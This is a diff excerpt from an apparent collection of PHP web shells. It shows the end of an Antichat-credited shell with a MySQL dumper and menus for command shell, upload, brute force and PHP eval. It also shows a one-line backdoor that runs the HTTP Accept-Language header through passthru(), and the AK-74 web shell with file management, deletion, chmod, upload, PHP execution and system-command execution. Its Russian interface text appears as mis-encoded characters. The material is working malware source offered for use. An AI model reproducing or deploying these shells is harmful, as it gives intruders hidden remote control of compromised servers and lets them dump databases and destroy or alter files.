while ($row = @mysql_fetch_assoc($res)) {
|
||||
$keys = @implode("`, `", @array_keys($row));
|
||||
$values = @array_values($row);
|
||||
foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
|
||||
$values = @implode("', '", $values);
|
||||
$sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".$values."');\r\n";
|
||||
}
|
||||
$sql2 .= "\r\n# ---------------------------------";
|
||||
}
|
||||
$content.="<center><b>Ãîòîâî! Äàìï ïðîøåë óäà÷íî!</b></center>";
|
||||
if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
|
||||
else { echo $sql1.$sql2; }
|
||||
} // end if(@mysql_select_db($_POST['mysql_db'],$db))
|
||||
else $content.="<center><b>Òàêîé ÁÄ íåò!</b></center>";
|
||||
@mysql_close($db);
|
||||
}
|
||||
} // end if(($_POST['dif']&&$fp)||(!$_POST['dif'])){
|
||||
else if(!empty($_POST['dif'])&&!$fp) { $content.="<center><b>ÎØÈÁÊÀ, íåò ïðàâ çàïèñè â ôàéë!</b></center>"; }
|
||||
|
||||
$content.="<form name='mysql_dump' action='$php_self' method='post'>
|
||||
<input type='hidden' name='action' value='$action'>
|
||||
Áàçà: <input type=text name=mysql_db size=15 value=";
|
||||
$content.=(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"));
|
||||
$content.="> Òàáëèöà: <input type=text name=mysql_tbl size=15 value=";
|
||||
$content.=(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"));
|
||||
$content.="> Ëîãèí: <input type=text name=mysql_l size=15 value=";
|
||||
$content.=(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"));
|
||||
$content.="> Ïàðîëü: <input type=text name=mysql_p size=15 value=";
|
||||
$content.=(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"));
|
||||
$content.="><input type=hidden name=dir size=85 value=".$dir.">
|
||||
<input type=hidden name=cmd size=85 value=mysql_dump>
|
||||
<br> Ñîõðàíèòü äàìï â ôàéëå: <input type=checkbox name=dif value=1 id=dif><input type=text name=dif_name size=80 value=";
|
||||
$content.=(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"));
|
||||
$content.="><input type=submit name=submit value=Ñîõðàíèòü></form>";
|
||||
|
||||
@$php_self=$_POST['PHP_SELF'];
|
||||
@$from=$_POST['from'];
|
||||
@$to=$_POST['to'];
|
||||
@$adress=$_POST['adress'];
|
||||
@$port=$_POST['port'];
|
||||
@$login=$_POST['login'];
|
||||
@$pass=$_POST['pass'];
|
||||
@$adress=$_POST['adress'];
|
||||
@$port=$_POST['port'];
|
||||
@$login=$_POST['login'];
|
||||
@$pass=$_POST['pass'];
|
||||
if(!isset($adress)){$adress="localhost";}
|
||||
if(!isset($login)){$login="root";}
|
||||
if(!isset($pass)){$pass="";}
|
||||
if(!isset($port)){$port="3306";}
|
||||
if(!isset($from)){$from=0;}
|
||||
if(!isset($to)){$to=50;}
|
||||
|
||||
if(!@$conn){
|
||||
$content.="<form name='mysql_dump' action='$php_self' method='post'>
|
||||
<table><tr><td valign=top>
|
||||
<input type='hidden' name='action' value='$action'>
|
||||
<input type=hidden name=ac value=sql>
|
||||
<tr><td valign=top>Õîñò: <input name=adress value='$adress' size=20>
|
||||
<tr><td valign=top>Ïîðò: <input name=port value='$port' size=20>
|
||||
<tr><td valign=top>Ëîãèí: <input name=login value='$login' size=20>
|
||||
<tr><td valign=top>Ïàðîëü: <input name=pass value='$pass' size=20>
|
||||
<input type=hidden name=p value=sql></td></tr>
|
||||
<tr><td></td><td><input type=submit name=conn value=Ïîäêëþ÷èòüñÿ></form></td></tr>
|
||||
</table>";
|
||||
}
|
||||
@$conn=$_POST['conn'];
|
||||
@$adress=$_POST['adress'];
|
||||
@$port=$_POST['port'];
|
||||
@$login=$_POST['login'];
|
||||
@$pass=$_POST['pass'];
|
||||
if($conn){
|
||||
|
||||
$serv = @mysql_connect("$adress:$port", "$login", "$pass") or die("ÎØÈÁÊÀ: ".mysql_error());
|
||||
if($serv){
|
||||
$content.="<form name='conn' action='$php_self' method='post'><input type=hidden name=conn value=0>
|
||||
<input type='hidden' name='action' value='$action'>
|
||||
Ñòàòóñ: Ïîäêëþ÷åí : <input type=submit name=exit value='Âûéòè èç áàçû'></form>
|
||||
<table><tr><td><font color=red>[Òàáëèöû]<br></br>";
|
||||
}
|
||||
$res = mysql_list_dbs($serv);
|
||||
while ($str=mysql_fetch_row($res)){
|
||||
$content.= "<table><a href=\"#\" onclick=\"document.dump1.db.value='$str[0]';document.dump1.tbl.value='$str[0]';document.dump1.submit();\">$str[0]</a></table>";
|
||||
@$tc++;
|
||||
}
|
||||
$content.="<form name='dump1' action='$php_self' method='POST'>
|
||||
<input type='hidden' name='action' value='$action'>
|
||||
<input type=hidden name=ac value=sql>
|
||||
<input name=base value='1' type=hidden>
|
||||
<input name=db value='$str[0]' type=hidden>
|
||||
<input name=p value='sql' type=hidden>
|
||||
<input name=adress value='$adress' type=hidden>
|
||||
<input name=port value='$port' type=hidden>
|
||||
<input name=login value='$login' type=hidden>
|
||||
<input name=pass value='$pass' type=hidden>
|
||||
<input name=conn value='1' type=hidden>
|
||||
<input name=tbl value='$str[0]' type=hidden></form>";
|
||||
|
||||
@$base=$_POST['base'];
|
||||
@$db=$_POST['db'];
|
||||
$content.="<br></br><font color=red>[Âñåãî òàáëèö: $tc]";
|
||||
if($base){
|
||||
$content.="<br></br><font color=red>Òàáëèöà: [$tbl]<br>";
|
||||
$result=mysql_list_tables($db);
|
||||
while($str=mysql_fetch_array($result)){
|
||||
$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
|
||||
$records=mysql_fetch_array($c);
|
||||
$content.="<table><font color=red>[$records[0]]</font><a href=\"#\" onclick=\"document.dump2.vn.value='$str[0]';document.dump2.tbl.value='$str[0]';document.dump2.submit();\">$str[0]</a></table>";
|
||||
|
||||
mysql_free_result($c);
|
||||
}}
|
||||
$content.="<form name='dump2' action='$php_self' method='post'>
|
||||
<input type='hidden' name='action' value='$action'>
|
||||
<input type=hidden name=ac value=sql>
|
||||
<input name=inside value='1' type=hidden>
|
||||
<input name=base value='1' type=hidden>
|
||||
<input name=vn value='$str[0]' type=hidden>
|
||||
<input name=db value='$db' type=hidden>
|
||||
<input name=p value='sql' type=hidden>
|
||||
<input name=adress value='$adress' type=hidden>
|
||||
<input name=port value='$port' type=hidden>
|
||||
<input name=login value='$login' type=hidden>
|
||||
<input name=pass value='$pass' type=hidden>
|
||||
<input name=tbl value='$str[0]' type=hidden>
|
||||
<input name=conn value='1' type=hidden></form>";
|
||||
|
||||
@$vn=$_POST['vn'];
|
||||
$content.= "<td valign=top>Áàçà äàííûõ: $db => $vn<br>";
|
||||
@$inside=$_POST['inside'];
|
||||
@$tbl=$_POST['tbl'];
|
||||
if($inside){
|
||||
$content.= "<table cellpadding=0 cellspacing=1><tr>";
|
||||
|
||||
mysql_select_db($db) or die(mysql_error());
|
||||
$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
|
||||
$cfa=mysql_fetch_array($c);
|
||||
mysql_free_result($c);
|
||||
$content.= "Âñåãî: $cfa[0]<form name='mysql_dump' action='$php_self' method='post'>
|
||||
<input type='hidden' name='action' value='$action'>
|
||||
<input type=hidden name=ac value=sql>
|
||||
Îò: <input name=from size=3 value=0>
|
||||
Äî: <input name=to size=3 value=$cfa[0]>
|
||||
<input type=submit name=show value='Çàãðóçèòü'>
|
||||
<input type=hidden name=inside value=1>
|
||||
<input type=hidden name=vn value=$vn>
|
||||
<input type=hidden name=db value=$db>
|
||||
<input type=hidden name=login value=$login>
|
||||
<input type=hidden name=pass value=$pass>
|
||||
<input type=hidden name=adress value=$adress>
|
||||
<input type=hidden name=conn value=1>
|
||||
<input type=hidden name=base value=1>
|
||||
<input type=hidden name=p value=sql>
|
||||
<input type=hidden name=tbl value=$tbl>
|
||||
</form>";
|
||||
@$vn=$_POST['vn'];
|
||||
@$from=$_POST['from'];
|
||||
@$to=$_POST['to'];
|
||||
@$from=$_POST['from'];
|
||||
@$to=$_POST['to'];
|
||||
if(!isset($from)){$from=0;}
|
||||
if(!isset($to)){$to=50;}
|
||||
$query = "SELECT * FROM $vn LIMIT $from,$to";
|
||||
$result = mysql_query($query);
|
||||
for ($i=0;$i<mysql_num_fields($result);$i++){
|
||||
$name=mysql_field_name($result,$i);
|
||||
$content.="<td> </td><td bgcolor=#44474f><font color=red> $name </font></td> ";
|
||||
}
|
||||
while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
|
||||
$content.= "<tr>";
|
||||
foreach ($mn as $come=>$lee) {
|
||||
$nst_inside=htmlspecialchars($lee);
|
||||
$content.= "<td> </td><td bgcolor=#44474f>$nst_inside</td>\r\n";
|
||||
}
|
||||
}
|
||||
mysql_free_result($result);
|
||||
$content.= "</table>";
|
||||
}}}
|
||||
|
||||
//end function
|
||||
|
||||
?><?=$header;?><table width="100%" bgcolor="#31333b" align="right" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="#" onclick="document.reqs.action.value='shell';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Shell |. </a></td><td><a href="#" onclick="document.reqs.action.value='viewer';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Viewer |.</a></td><td><a href="#" onclick="document.reqs.action.value='editor';document.reqs.file.value='<?=$file;?>';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Editor |.</a></td><td><a href="#" onclick="document.reqs.action.value='upload';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Upload |.</a></td><td><a href="#" onclick="document.reqs.action.value='brute';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Brute |.</a></td><td><a href="#" onclick="document.reqs.action.value='mysql';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Mysql Dumper|.</a></td><td><a href="#" onclick="document.reqs.action.value='phpeval';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Php Eval |.</a></td><td><a href="#" onclick="history.back();">.| <-back |.</a></td><td><a href="#" onclick="history.forward();">.| forward->|.</a></td></tr></table></td></tr></table><br><form name='reqs' method='POST'><input name='action' type='hidden' value=''><input name='dir' type='hidden' value=''><input name='file' type='hidden' value=''></form><table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#363940 borderColorLight=#c0c0c0 border=1> <tr><td>Safe mode: <?php echo $safe_mode;?><br>Disable functions: <?php echo $disfunc;?><br>OS: <?php echo @php_uname();?><br>Server: <?php echo @getenv("SERVER_SOFTWARE")?><br>Id: <?php echo "Uid=".getmyuid(). " Gid=".getmygid(); ?><br><? echo 'Server: '.@gethostbyname($_SERVER["HTTP_HOST"]).' You: '.$_SERVER['REMOTE_ADDR'].' XFF: '.@gethostbyaddr($HTTP_X_FORWARDED_FOR).' ';?></br> Status: <?php echo @$stdata;?></td></tr></table><table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#363940 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?=$content;?>
|
||||
<br></table><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#44474f BORDER=1 width=100% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=#44474f><tr><td><center><font color='#9acd32' face='Tahoma' size = 2><b>| COPYRIGHT BY ANTICHAT.RU | Made by Grinay | Modified by Go0o$E |</b></font></center></td></tr></table><?=$footer;?>
|
1
xakep-shells/PHP/accept_language.php.txt
Normal file
1
xakep-shells/PHP/accept_language.php.txt
Normal file
|
@ -0,0 +1 @@
|
|||
<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); echo '<br> by q1w2e3r4'; ?>
|
640
xakep-shells/PHP/ak74shell.php.php.txt
Normal file
640
xakep-shells/PHP/ak74shell.php.php.txt
Normal file
|
@ -0,0 +1,640 @@
|
|||
<?
|
||||
/*
|
||||
|
||||
.:: :[AK-74 Security Team Web Shell Beta Version]: ::.
|
||||
|
||||
- AK-74 Security Team Web Site: www.ak74-team.net
|
||||
- Released on 01 June 2006.
|
||||
- Copyright AK-74 Security Team, 2006.
|
||||
- Thank you for using our script.
|
||||
|
||||
*/
|
||||
error_reporting(0);
|
||||
set_time_limit(0);
|
||||
session_start();
|
||||
$xshell = $SERVER_['PHP_SELF'];
|
||||
class shell
|
||||
{
|
||||
|
||||
function getfiles()
|
||||
{
|
||||
$mas = array();
|
||||
$i = 0;
|
||||
if ($handle = opendir($_SESSION['currentdir']))
|
||||
{
|
||||
while (false !== ($file = readdir($handle)))
|
||||
if ($file != '..')
|
||||
if (!is_dir($_SESSION['currentdir'].'/'.$file))
|
||||
{
|
||||
$mas[$i]['filename'] = $file;
|
||||
$mas[$i]['filesize'] = filesize($_SESSION['currentdir'].'/'.$file);
|
||||
$mas[$i]['lastmod'] = date("H.i/d.m.Y", filemtime($_SESSION['currentdir'].'/'.$file));
|
||||
$i++;
|
||||
}
|
||||
closedir($handle);
|
||||
}
|
||||
return $mas;
|
||||
}
|
||||
|
||||
function getdirs()
|
||||
{
|
||||
$mas = array();
|
||||
if ($handle = opendir($_SESSION['currentdir']))
|
||||
{
|
||||
while (false !== ($dir = readdir($handle)))
|
||||
if ($dir != '.' && is_dir($_SESSION['currentdir'].'/'.$dir))
|
||||
$mas[] = $dir;
|
||||
closedir($handle);
|
||||
}
|
||||
return $mas;
|
||||
}
|
||||
|
||||
function geturl()
|
||||
{
|
||||
if ($_SESSION['currentdir'].'/' == $_SERVER['DOCUMENT_ROOT'])
|
||||
return '/';
|
||||
if (strpos($_SESSION['currentdir'],str_replace('\\','/',$_SERVER['DOCUMENT_ROOT'])) === false)
|
||||
return '';
|
||||
return str_replace($_SERVER['DOCUMENT_ROOT'],'',$_SESSION['currentdir'].'/');
|
||||
}
|
||||
|
||||
|
||||
function removefile()
|
||||
{
|
||||
if (file_exists($_GET['file']))
|
||||
{
|
||||
chmod($_GET['file'],0777);
|
||||
if (unlink($_GET['file']))
|
||||
return 'Ôàéë óäàëåí!';
|
||||
else
|
||||
return 'Ôàéë óäàëåí!';
|
||||
}
|
||||
else
|
||||
return 'Ôàéë íå íàéäåí!';
|
||||
}
|
||||
|
||||
function removedir()
|
||||
{
|
||||
chmod($_GET['dir'],0777);
|
||||
if (rmdir($_GET['dir']))
|
||||
return 'Äèðåêòîðèÿ óäàëåíà!';
|
||||
else
|
||||
return 'Äèðåêòîðèÿ íå íàéäåía!';
|
||||
}
|
||||
|
||||
function getmicrotime()
|
||||
{
|
||||
list($usec, $sec) = explode(" ",microtime());
|
||||
return ((float)$usec + (float)$sec);
|
||||
}
|
||||
|
||||
function getpermission($path)
|
||||
{
|
||||
|
||||
$perms = fileperms($path);
|
||||
|
||||
if (($perms & 0xC000) == 0xC000)
|
||||
$info = 's';
|
||||
elseif (($perms & 0xA000) == 0xA000)
|
||||
$info = 'l';
|
||||
elseif (($perms & 0x8000) == 0x8000)
|
||||
$info = '-';
|
||||
elseif (($perms & 0x6000) == 0x6000)
|
||||
$info = 'b';
|
||||
elseif (($perms & 0x4000) == 0x4000)
|
||||
$info = 'd';
|
||||
elseif (($perms & 0x2000) == 0x2000)
|
||||
$info = 'c';
|
||||
elseif (($perms & 0x1000) == 0x1000)
|
||||
$info = 'p';
|
||||
else
|
||||
$info = 'u';
|
||||
|
||||
$info .= (($perms & 0x0100) ? 'r' : '-');
|
||||
$info .= (($perms & 0x0080) ? 'w' : '-');
|
||||
$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
|
||||
|
||||
$info .= (($perms & 0x0020) ? 'r' : '-');
|
||||
$info .= (($perms & 0x0010) ? 'w' : '-');
|
||||
$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
|
||||
|
||||
$info .= (($perms & 0x0004) ? 'r' : '-');
|
||||
$info .= (($perms & 0x0002) ? 'w' : '-');
|
||||
$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $info;
|
||||
}
|
||||
|
||||
function getpermissionarray($path)
|
||||
{
|
||||
$res = array();
|
||||
$perms = fileperms($path);
|
||||
|
||||
if (($perms & 0xC000) == 0xC000)
|
||||
$res[] = 's';
|
||||
elseif (($perms & 0xA000) == 0xA000)
|
||||
$res[] = 'l';
|
||||
elseif (($perms & 0x8000) == 0x8000)
|
||||
$res[] = '-';
|
||||
elseif (($perms & 0x6000) == 0x6000)
|
||||
$res[] = 'b';
|
||||
elseif (($perms & 0x4000) == 0x4000)
|
||||
$res[] = 'd';
|
||||
elseif (($perms & 0x2000) == 0x2000)
|
||||
$res[] = 'c';
|
||||
elseif (($perms & 0x1000) == 0x1000)
|
||||
$res[] = 'p';
|
||||
else
|
||||
$res[] = 'u';
|
||||
|
||||
$res[] = (($perms & 0x0100) ? 'r' : '-');
|
||||
$res[] = (($perms & 0x0080) ? 'w' : '-');
|
||||
$res[] = (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
|
||||
|
||||
$res[] = (($perms & 0x0020) ? 'r' : '-');
|
||||
$res[] = (($perms & 0x0010) ? 'w' : '-');
|
||||
$res[] = (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
|
||||
|
||||
$res[] = (($perms & 0x0004) ? 'r' : '-');
|
||||
$res[] = (($perms & 0x0002) ? 'w' : '-');
|
||||
$res[] = (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $res;
|
||||
}
|
||||
|
||||
function outputhead()
|
||||
{
|
||||
$res = '';
|
||||
$res .= '<html><head><title>AK-74 Security Team Web Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"></head>
|
||||
<body>
|
||||
<STYLE>
|
||||
A:link {
|
||||
COLOR: #4d6d91; TEXT-DECORATION: underline
|
||||
}
|
||||
A:active {
|
||||
COLOR: #4d6d91; TEXT-DECORATION: underline
|
||||
}
|
||||
A:visited {
|
||||
COLOR: #4d6d91; TEXT-DECORATION: underline
|
||||
}
|
||||
A:hover {
|
||||
COLOR: #C10000; TEXT-DECORATION: underline
|
||||
}
|
||||
TD {
|
||||
FONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica
|
||||
}
|
||||
BODY {
|
||||
FONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica; SCROLLBAR-FACE-COLOR: #cccccc; SCROLLBAR-HIGHLIGHT-COLOR: #c10000; SCROLLBAR-SHADOW-COLOR: #c10000; SCROLLBAR-3DLIGHT-COLOR: #830000; SCROLLBAR-ARROW-COLOR: #c10000; SCROLLBAR-TRACK-COLOR: #eeeeee; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #830000; BACKGROUND-COLOR: #dcdcdc;
|
||||
}
|
||||
</STYLE>
|
||||
<div align="center"><table border=1 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 2px solid">
|
||||
<tr>
|
||||
<td colspan=7 align="center">
|
||||
<b><font color=#830000 size=4>.:: :[ AK-74 Security Team Web-shell ]: ::.</font></b>
|
||||
</td>
|
||||
</tr>';
|
||||
return $res;
|
||||
}
|
||||
|
||||
function outputmenu()
|
||||
{
|
||||
$res = '';
|
||||
$res .= '<tr>
|
||||
<td colspan=7 align="center">
|
||||
<table border=0 cellspacing=0 cellpadding=0>
|
||||
<tr align="center">
|
||||
<td width=150>
|
||||
<a href="'.$xshell.'?act=info">Îáùàÿ èíôîðìàöèÿ</a>
|
||||
</td>
|
||||
<td width=150>
|
||||
<a href="'.$xshell.'?act=filemanager">Ôàéëîâûé ìåíåäæåð</a>
|
||||
</td>
|
||||
<td width=80>
|
||||
<a href="'.$xshell.'?act=phpinfo" target="_blank">phpinfo()</a>
|
||||
</td>
|
||||
<td width=110>
|
||||
<a href="'.$xshell.'?act=execute">Âûïîëíèòü PHP</a>
|
||||
</td>
|
||||
<td width=150>
|
||||
<a href="'.$xshell.'?act=exesys">Âûïîëíèòü êîìàíäó</a>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>';
|
||||
return $res;
|
||||
}
|
||||
|
||||
function outputdown()
|
||||
{
|
||||
$res = '';
|
||||
$res .= '</table></div></body></html>';
|
||||
return $res;
|
||||
}
|
||||
|
||||
function outputfilemanager()
|
||||
{
|
||||
$res = '';
|
||||
$number = 0;
|
||||
$dirs = $this->getdirs();
|
||||
$files = $this->getfiles();
|
||||
sort($dirs);
|
||||
sort($files);
|
||||
|
||||
$res .= '
|
||||
<tr>
|
||||
<td colspan=7 align="center">
|
||||
<font color=#830000> Òåêóùàÿ äèðåêòîðèÿ:</font><b><font color=#830000>'.$_SESSION['currentdir'].'</font></b>
|
||||
</td>
|
||||
</tr>
|
||||
<tr align="center">
|
||||
<td width=30>
|
||||
|
||||
</td>
|
||||
<td width=330>
|
||||
|
||||
</td>
|
||||
<td width=80><font color=#830000>Ðàçìåð,</font> <b><font color=#830000>áàéò</font></b>
|
||||
|
||||
</td>
|
||||
<td width=120><font color=#830000>
|
||||
Ïîñëåäíåå èçìåíåíèå
|
||||
</font>
|
||||
</td>
|
||||
<td width=80 align="center"><font color=#830000>Ïðàâà äîñòóïà</font>
|
||||
|
||||
</td>
|
||||
<td width=30>
|
||||
|
||||
</td>
|
||||
<td width=30>
|
||||
|
||||
</td>
|
||||
</tr>';
|
||||
|
||||
for ($i = 0; $i < count($dirs); $i++)
|
||||
{
|
||||
$res .= '<tr><td><b><font color=#830000>'.(++$number).'</font></b></td><td><b><a href="'.$xshell.'?act=filemanager&dir='.$dirs[$i].'">'.$dirs[$i].'</a></b></td><td> </td><td> </td><td>';
|
||||
$res .= '<a href="'.$xshell.'?act=chmod&file='.$_SESSION['currentdir'].'/'.$dirs[$i].'">'.($this->getpermission($_SESSION['currentdir'].'/'.$dirs[$i])).'</a>';
|
||||
$res .= '</td><td> </td><td><a href="'.$xshell.'?act=filemanager&act3=del&dir='.$_SESSION['currentdir'].'/'.$dirs[$i].'">delete</a></td></tr>';
|
||||
}
|
||||
for ($i = 0; $i < count($files); $i++)
|
||||
{
|
||||
$res .= '<tr><td><b><font color=#830000>'.(++$number).'</font></b></td>';
|
||||
$res .= '<td><a href="'.$xshell.'?act=down&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">'.$files[$i]['filename'].'</a></td>';
|
||||
$res .= '<td> '.$files[$i]['filesize'].'</td>';
|
||||
$res .= '<td align="center">'.$files[$i]['lastmod'].'</td>';
|
||||
$res .= '<td align="center"><a href="'.$xshell.'?act=chmod&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">'.($this->getpermission($_SESSION['currentdir'].'/'.$files[$i]['filename'])).'</a></td>';
|
||||
$res .= '<td align="center"><a href="'.$xshell.'?act=edit&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">edit</a></td>';
|
||||
$res .= '<td align="center"><a href="'.$xshell.'?act=filemanager&act2=del&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">delete</a></td></tr>';
|
||||
}
|
||||
$res .= '</table><br>';
|
||||
|
||||
$res .= '<table border=0 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 2px solid">';
|
||||
$res .= '<tr><td align=center><form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="mkdir"><b><font color=#830000>Ñîçäàòü äèðåêòîðèþ:</b></font> </td><td><input type="text" name="dircreate"><input type="submit" value="Ñîçäàòü"></form></td></tr>';
|
||||
$res .= '<tr><td align=center><form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="createfile"><b><font color=#830000>Ñîçäàòü ôàéë:</b></font></td><td> <input type="text" name="filecreate"><input type="submit" value="Ñîçäàòü"></form></td></tr>';
|
||||
$res .= '<tr><td align=center><form enctype="multipart/form-data" action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="uploadfile"><b><font color=#830000>Çàêà÷àòü ôàéë:</font></b></td><td><input type="file" name="filename" size="23"> <b><font color=#830000>è ïðèñâîèòü èìÿ</b></font></td><td> <input type="text" name="filename2"><input type="submit" value="Âïåð¸ä"></form></td></tr>';
|
||||
$res .= '<table border=0 width="700" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">';
|
||||
$res .= '<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
|
||||
return $res;
|
||||
}
|
||||
|
||||
function outputinfo()
|
||||
{
|
||||
$res = '';
|
||||
$res .= '<tr>
|
||||
<td align="center" colspan=7>
|
||||
<b><font color=#83000>Îáùàÿ èíôîðìàöèÿ î ñåðâåðå</font></b>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td colspan=7 align="left"><br>
|
||||
<ol>
|
||||
<b><font color=#830000>1. OS - </font></b><font color=#830000>'.(php_uname()).'</font><br><br>
|
||||
<b><font color=#830000>2. Âåðñèÿ PHP - </font></b><font color=#830000>'.(phpversion()).'</font><br><br>
|
||||
<b><font color=#830000>3.</font></b><font color=#830000> <b><font color=#830000>User</b></font> - '.( get_current_user()).' <b><font color=#830000>|| User ID</font></b> - '.( getmyuid()).' <b><font color=#830000>|| Group ID</b></font> - '.( getmygid ()).'</font><br><br>
|
||||
<b><font color=#830000>4. Server Software - </font></b><font color=#830000>'.(getenv('SERVER_SOFTWARE')).'</font><br><br>
|
||||
<b><font color=#830000>5. Request Method - </font></b><font color=#830000>'.(getenv('REQUEST_METHOD')).'</font><br><br>
|
||||
<b><font color=#830000>6. Server IP - </font></b><font color=#830000>'.(getenv('SERVER_ADDR')).'</font><br><br>
|
||||
<b><font color=#830000>7. Your IP - </font></b><font color=#830000>'.(getenv('REMOTE_ADDR')).'</font><br><br>
|
||||
<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'.(getenv('HTTP_X_FORWARDED_FOR')).'</font><br><br>
|
||||
</td>
|
||||
</tr>
|
||||
<table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
|
||||
<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
|
||||
|
||||
return $res;
|
||||
}
|
||||
|
||||
function chmodform($file)
|
||||
{
|
||||
$perms = $this->getpermissionarray($file);
|
||||
$res = '';
|
||||
$res .= '<form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="chmod">'
|
||||
.'<input type="hidden" name="file" value="'.$file.'">
|
||||
<tr>
|
||||
<td align="center" colspan=7>
|
||||
<b><font color=#83000>Èçìåíåíèå ïðàâ äîñòóïà</font></b>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td colspan=7 align="center">
|
||||
<table border=1 cellspacing=0 cellpadding=0>';
|
||||
$res .= '<tr align="center"><td> </td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td></tr>';
|
||||
$res .= '<tr><td><input type="hidden" name="perms0" value="'.$perms[0].'">'.$perms[0].'</td>';
|
||||
for ($i = 1; $i <= 9; $i++)
|
||||
$res .= '<td><input type="checkbox" name="perms'.$i.'"'.(($perms[$i] != '-') ? ' checked' : '' ).'></td>';
|
||||
$res .= '</tr><tr><td colspan=10 align="right"><input type="submit" value="Ñîõðàíèòü"></td></tr>';
|
||||
$res .= '</table></td></tr></form>';
|
||||
return $res;
|
||||
}
|
||||
|
||||
function editfileform($file)
|
||||
{
|
||||
$fp = fopen($file,'r');
|
||||
if (!$fp)
|
||||
return 'Ðåäàêòèðîâàíèå ôàéëà';
|
||||
$res = '';
|
||||
$res .= '<form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="editfile">'
|
||||
.'<input type="hidden" name="file" value="'.$file.'"><tr>
|
||||
<td align="center" colspan=7>
|
||||
<b><font color=#83000>Ðåäàêòèðîâàíèå ôàéëà</font></b>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td colspan=7 align="center">
|
||||
<table border=1 cellspacing=0 cellpadding=0>';
|
||||
$res .= '<tr><td><textarea rows=25 cols=100 name="filecontent">'.(htmlspecialchars(fread($fp, filesize($file)))).'</textarea></td></tr>';
|
||||
$res .= '<tr><td align="right"><b><font color=#830000>Rename:</font></b> <INPUT TYPE=TEXT NAME=rename size=100 maxlength=9999999 value='.$file.'> - <input type="submit" value="Ðåäàêòèðîâàòü"></td></tr>';
|
||||
$res .= '</table></td></tr></form>';
|
||||
fclose($fp);
|
||||
return $res;
|
||||
}
|
||||
|
||||
function executeform()
|
||||
{
|
||||
$res = '';
|
||||
$res .= '<form action="'.$xshell.'?act=execute" method="post"><input type="hidden" name="action" value="execute">
|
||||
<tr>
|
||||
<td align="center" colspan=7>
|
||||
<b><font color=#83000>Âûïîëíåíèå PHP-êîäà<br> Îòêðûòèå è çàêðûòèå PHP êîäà ( <? è ?> ) ïèñàòü íå íóæíî!</font></b>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td colspan=7 align="center">
|
||||
